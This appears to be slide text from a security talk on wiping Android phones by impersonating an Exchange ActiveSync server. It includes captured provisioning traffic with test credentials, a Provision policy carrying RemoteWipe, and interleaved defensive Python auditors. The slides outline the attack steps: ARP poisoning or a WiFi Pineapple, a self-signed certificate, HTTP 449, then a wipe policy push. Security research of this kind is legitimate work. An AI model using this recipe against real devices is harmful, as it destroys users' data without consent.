Post pentest drinks with client

... So if you own the Active Directory server, what exactly can you do?

The norm: control of every user, ability to push policy updates, etc...

Exchange can remotely wipe devices, so why not that too?
Do we really need Exchange for that though?

Maybe we just send the phone those commands directly

but...

THAT COULDN’T POSSIBLY WORK

It couldn’t be that easy, could it?


Surely SSL would prevent this if nothing else.

Maybe it uses some sort of secure exchange, shared secrets, something...

I had a talk with a Microsoft Exchange admin type person...


“It should work fine, as long as SSL is disabled”

Damn... Well, let’s try it out anyway!

Let’s get some packet dumps of a legit wipe operation


Exchange can’t be that hard to install, right? I’ve done postfix & sendmail before

Crap.

Packet Sniffing - Provisioning


POST /Microsoft-Server-ActiveSync?Cmd=.&DeviceType=Android HTTP/1.1
Content-Type: application/vnd.ms-sync.wbxml
Authorization: Basic ZnVja2VyeS5mdWNrXGRpcnQ6cGFzc3dvcmQxMjMk
MS-ASProtocolVersion: 12.0
Connection: keep-alive
User-Agent: Android/0.3
X-MS-PolicyKey: 358347207
Content-Length: 13
Host: 192.168.1.218

HTTP/1.1 449 Retry after sending a PROVISION command
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
MS-Server-ActiveSync: 14.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 08 May 2012 07:08:22 GMT
Content-Length: 54

The custom error module does not recognize this error.
POST /Microsoft-Server-ActiveSync?Cmd=Provision&User=.&DeviceType=Android HTTP/1.1
Content-Type: application/vnd.ms-sync.wbxml
Authorization: Basic ZnVja2VyeS5mdWNrXGRpcnQ6cGFzc3dvcmQxMjMk
MS-ASProtocolVersion: 12.0
Connection: keep-alive
User-Agent: Android/0.3
X-MS-PolicyKey: 0
Content-Length: 41
Host: 192.168.1.218

..j...EFGH.MS-EAS-Provisioning-WBXML.

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/vnd.ms-sync.wbxml
Server: Microsoft-IIS/7.5
MS-Server-ActiveSync: 14.0
Date: Tue, 08 May 2012 07:00:04 GMT
Content-Length: 123

..j...EK.l..FGH.MS-EAS-Provisioning-WBXML..K.l..1.2761868790..3MN.0..0.0..Q.0..P.0..S.l..T.4..U.900. .
V.8...X.l...Z.0.
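The request/response pairs above, parsed into structured records so the provisioning cycle can be picked out of a capture. This is an added example, not code from the talk or from any project it mentions. The capture text is constructed to mirror the slides: the user name, the first command (Sync) and the Authorization value are placeholders, and messages are assumed to alternate request, response as they do in the capture. The 449 followed by a Provision request carrying X-MS-PolicyKey: 0 is the sequence a device walks through before it accepts a new policy, so it is the sequence to look for in proxy or IIS logs when auditing provisioning activity; Basic credentials on the same requests are flagged because anything that can read the channel can read them.

```python
"""Parse a captured Exchange ActiveSync HTTP exchange and flag the
provisioning cycle (449 -> Provision with PolicyKey 0).

Added example, not code from the talk. CAPTURE is constructed to mirror the
slide transcript; the user, the first command and the Authorization value
are placeholders. Messages are assumed to alternate request, response.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed capture in the shape of the slides.
CAPTURE = """POST /Microsoft-Server-ActiveSync?Cmd=Sync&User=alice&DeviceType=Android HTTP/1.1
Content-Type: application/vnd.ms-sync.wbxml
Authorization: Basic PLACEHOLDER
MS-ASProtocolVersion: 12.0
User-Agent: Android/0.3
X-MS-PolicyKey: 358347207
Host: 192.168.1.218

HTTP/1.1 449 Retry after sending a PROVISION command
Server: Microsoft-IIS/7.5
MS-Server-ActiveSync: 14.0

POST /Microsoft-Server-ActiveSync?Cmd=Provision&User=alice&DeviceType=Android HTTP/1.1
Content-Type: application/vnd.ms-sync.wbxml
Authorization: Basic PLACEHOLDER
MS-ASProtocolVersion: 12.0
User-Agent: Android/0.3
X-MS-PolicyKey: 0
Host: 192.168.1.218

HTTP/1.1 200 OK
Content-Type: application/vnd.ms-sync.wbxml
MS-Server-ActiveSync: 14.0
"""

# A message starts with a request line ("POST /path HTTP/1.1") or a status
# line ("HTTP/1.1 449 ...") and runs until the next such line.
MESSAGE_START = re.compile(r"^(?:[A-Z]+ \S+ HTTP/\d\.\d|HTTP/\d\.\d \d{3})")


def split_messages(text):
    """Split the capture into a list of messages (each a list of lines)."""
    messages, current = [], []
    for line in text.splitlines():
        if MESSAGE_START.match(line) and current:
            messages.append(current)
            current = []
        if line.strip():          # blank lines are just separators here
            current.append(line)
    if current:
        messages.append(current)
    return messages


def parse_message(lines):
    """Turn one message into a dict: request (cmd, user, policy key, auth
    scheme) or response (status). Header names are lower-cased."""
    first, headers = lines[0], {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if first.startswith("HTTP/"):
        return {"kind": "response", "status": int(first.split()[1]),
                "headers": headers}
    method, target, _ = first.split()
    query = parse_qs(urlsplit(target).query)
    return {"kind": "request", "method": method,
            "cmd": query.get("Cmd", [""])[0],
            "user": query.get("User", [""])[0],
            "policy_key": headers.get("x-ms-policykey"),
            "auth_scheme": headers.get("authorization", "").split(" ")[0],
            "headers": headers}


def audit_exchange(messages):
    """Pair each request with the following response and report the
    re-provisioning pattern plus Basic credentials on the wire."""
    parsed = [parse_message(m) for m in messages]
    pairs = [(parsed[i], parsed[i + 1]) for i in range(0, len(parsed) - 1, 2)]
    findings = []
    for i, (req, resp) in enumerate(pairs):
        if req["kind"] != "request" or resp["kind"] != "response":
            continue                       # capture out of step; skip pair
        if resp["status"] == 449:
            findings.append("device of %s (key %s) told to re-provision"
                            % (req["user"], req["policy_key"]))
        if req["cmd"] == "Provision" and req["policy_key"] == "0":
            prev = pairs[i - 1][1].get("status") if i > 0 else None
            findings.append("Provision with PolicyKey 0 from %s after status %s"
                            % (req["user"], prev))
        if req["auth_scheme"] == "Basic":
            findings.append("Basic credentials sent with Cmd=%s" % req["cmd"])
    return findings


if __name__ == "__main__":
    for finding in audit_exchange(split_messages(CAPTURE)):
        print(finding)
```

On the constructed capture it reports the 449 against the device's old policy key, the Provision request that follows with PolicyKey 0, and Basic credentials on both requests. Run over a larger capture, a Provision-with-key-0 that is not preceded by a 449 from the expected server is the odd one out.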
<Provision>
  <Status>1</Status>
  <Policies>
    <Policy>
      <PolicyType>MS-EAS-Provisioning-WBXML</PolicyType>
      <Status>1</Status>
      <PolicyKey>2761868790</PolicyKey>
      <Data>
        <EASProvisionDoc>
          <DevicePasswordEnabled>0</DevicePasswordEnabled>
          <AlphanumericDevicePasswordRequired>0</AlphanumericDevicePasswordRequired>
          <PasswordRecoveryEnabled>0</PasswordRecoveryEnabled>
          <DeviceEncryptionEnabled>0</DeviceEncryptionEnabled>
          <AttachmentsEnabled>1</AttachmentsEnabled>
          <MinDevicePasswordLength>4</MinDevicePasswordLength>
          <MaxInactivityTimeDeviceLock>900</MaxInactivityTimeDeviceLock>
          <MaxDevicePasswordFailedAttempts>8</MaxDevicePasswordFailedAttempts>
          <MaxAttachmentSize />
          <AllowSimpleDevicePassword>1</AllowSimpleDevicePassword>
          <DevicePasswordExpiration />
          <DevicePasswordHistory>0</DevicePasswordHistory>
        </EASProvisionDoc>
      </Data>
    </Policy>
  </Policies>
  <RemoteWipe />
</Provision>
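An added example (not the talk's code) that audits the decoded Provision document above: it flags the RemoteWipe element and compares the EASProvisionDoc settings to a baseline. It works on the plain decoded form the slide shows (no XML namespace; a real WBXML decoder would emit the Provision namespace and the tag lookups would need adjusting), the sample document is constructed from the slide contents, and the baseline thresholds are values chosen for the example rather than Exchange defaults.

```python
"""Audit a decoded Exchange ActiveSync (EAS) Provision response.

Added example, not code from the talk. Works on the plain decoded form shown
on the slides (no XML namespaces). SAMPLE_PROVISION is constructed from the
slide contents; BASELINE values are chosen for the example, not Exchange
defaults.
"""
import xml.etree.ElementTree as ET

# Constructed sample: the policy the slides show, including the wipe element.
SAMPLE_PROVISION = """<Provision>
  <Status>1</Status>
  <Policies>
    <Policy>
      <PolicyType>MS-EAS-Provisioning-WBXML</PolicyType>
      <Status>1</Status>
      <PolicyKey>2761868790</PolicyKey>
      <Data>
        <EASProvisionDoc>
          <DevicePasswordEnabled>0</DevicePasswordEnabled>
          <AlphanumericDevicePasswordRequired>0</AlphanumericDevicePasswordRequired>
          <PasswordRecoveryEnabled>0</PasswordRecoveryEnabled>
          <DeviceEncryptionEnabled>0</DeviceEncryptionEnabled>
          <AttachmentsEnabled>1</AttachmentsEnabled>
          <MinDevicePasswordLength>4</MinDevicePasswordLength>
          <MaxInactivityTimeDeviceLock>900</MaxInactivityTimeDeviceLock>
          <MaxDevicePasswordFailedAttempts>8</MaxDevicePasswordFailedAttempts>
          <MaxAttachmentSize />
          <AllowSimpleDevicePassword>1</AllowSimpleDevicePassword>
          <DevicePasswordExpiration />
          <DevicePasswordHistory>0</DevicePasswordHistory>
        </EASProvisionDoc>
      </Data>
    </Policy>
  </Policies>
  <RemoteWipe />
</Provision>"""

# Assumed baseline for a few settings: (comparison, threshold).
BASELINE = {
    "DevicePasswordEnabled": ("eq", 1),
    "DeviceEncryptionEnabled": ("eq", 1),
    "AllowSimpleDevicePassword": ("eq", 0),
    "MinDevicePasswordLength": ("ge", 6),
    "MaxDevicePasswordFailedAttempts": ("le", 10),
    "MaxInactivityTimeDeviceLock": ("le", 900),
}


def parse_provision(xml_text):
    """Return (status, policy_key, settings dict, remote_wipe flag).
    Empty elements such as <MaxAttachmentSize /> map to None."""
    root = ET.fromstring(xml_text)
    if root.tag != "Provision":
        raise ValueError("not a Provision document")
    status = int(root.findtext("Status", default="0"))
    policy = root.find("Policies/Policy")
    policy_key = policy.findtext("PolicyKey") if policy is not None else None
    settings = {}
    doc = root.find("Policies/Policy/Data/EASProvisionDoc")
    if doc is not None:
        for child in doc:
            text = (child.text or "").strip()
            settings[child.tag] = int(text) if text.isdigit() else None
    remote_wipe = root.find("RemoteWipe") is not None
    return status, policy_key, settings, remote_wipe


def audit_provision(xml_text, baseline=BASELINE):
    """Return a list of findings: the wipe first, then baseline violations
    in baseline order."""
    status, policy_key, settings, remote_wipe = parse_provision(xml_text)
    findings = []
    if remote_wipe:
        findings.append("REMOTE WIPE requested (PolicyKey %s)" % policy_key)
    for name, (op, threshold) in baseline.items():
        value = settings.get(name)
        if value is None:
            findings.append("%s: not set" % name)
            continue
        ok = {"eq": value == threshold,
              "ge": value >= threshold,
              "le": value <= threshold}[op]
        if not ok:
            findings.append("%s=%s violates baseline %s %s"
                            % (name, value, op, threshold))
    return findings


if __name__ == "__main__":
    for finding in audit_provision(SAMPLE_PROVISION):
        print(finding)
```

On the slide's document it reports the wipe first, then DevicePasswordEnabled, DeviceEncryptionEnabled, AllowSimpleDevicePassword and MinDevicePasswordLength as below the baseline; the failed-attempts and inactivity settings pass. Pointed at the policy a device actually holds, the same check shows what the device would accept from whichever server it trusts.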
• WiFi is cool, phones have WiFi
• ARP Poisoning
• Pineapple
Step 1: Request

Accept connection
Use a shonky self signed SSL cert

Send HTTP error 449

Step 3: Wipe

Send policy push containing wipe command

Celebrate.
Oh no

Let’s hope this works....

Did I chicken out and go with the recording? Let’s see!

(Boo or Cheer accordingly)
Compulsory OSS Project: Protocol

• Emulate ActiveSync Protocol
• Allow for projects to interact with mobile clients in new ways
• Translation layer between Exchange clients and other servers
• Lots of things!

• Wouldn’t it be nice if we could get data back off the phones
• Remote backup functionality
• Sync features
• Hopefully possible!

Lofty Goal: Ongoing Access

• What sort of configuration options can we set?
• Anything undocumented?
• Can we reconfigure the device to point at another server?
• Brett Turner
• Andrew Kitis
• Rob McKnight
• Randal Adamson
• Sid
• Murray Brand
• Clinton Carpene
• #nodavesclub
• #cduc
• #kiwicon

THANKS FOR LISTENING
ANY QUESTIONS?

EMAIL: PETER@HANNAY.ID.AU
TWITTER: @KRONICD
WEBS: HTTP://OPENDUCK.COM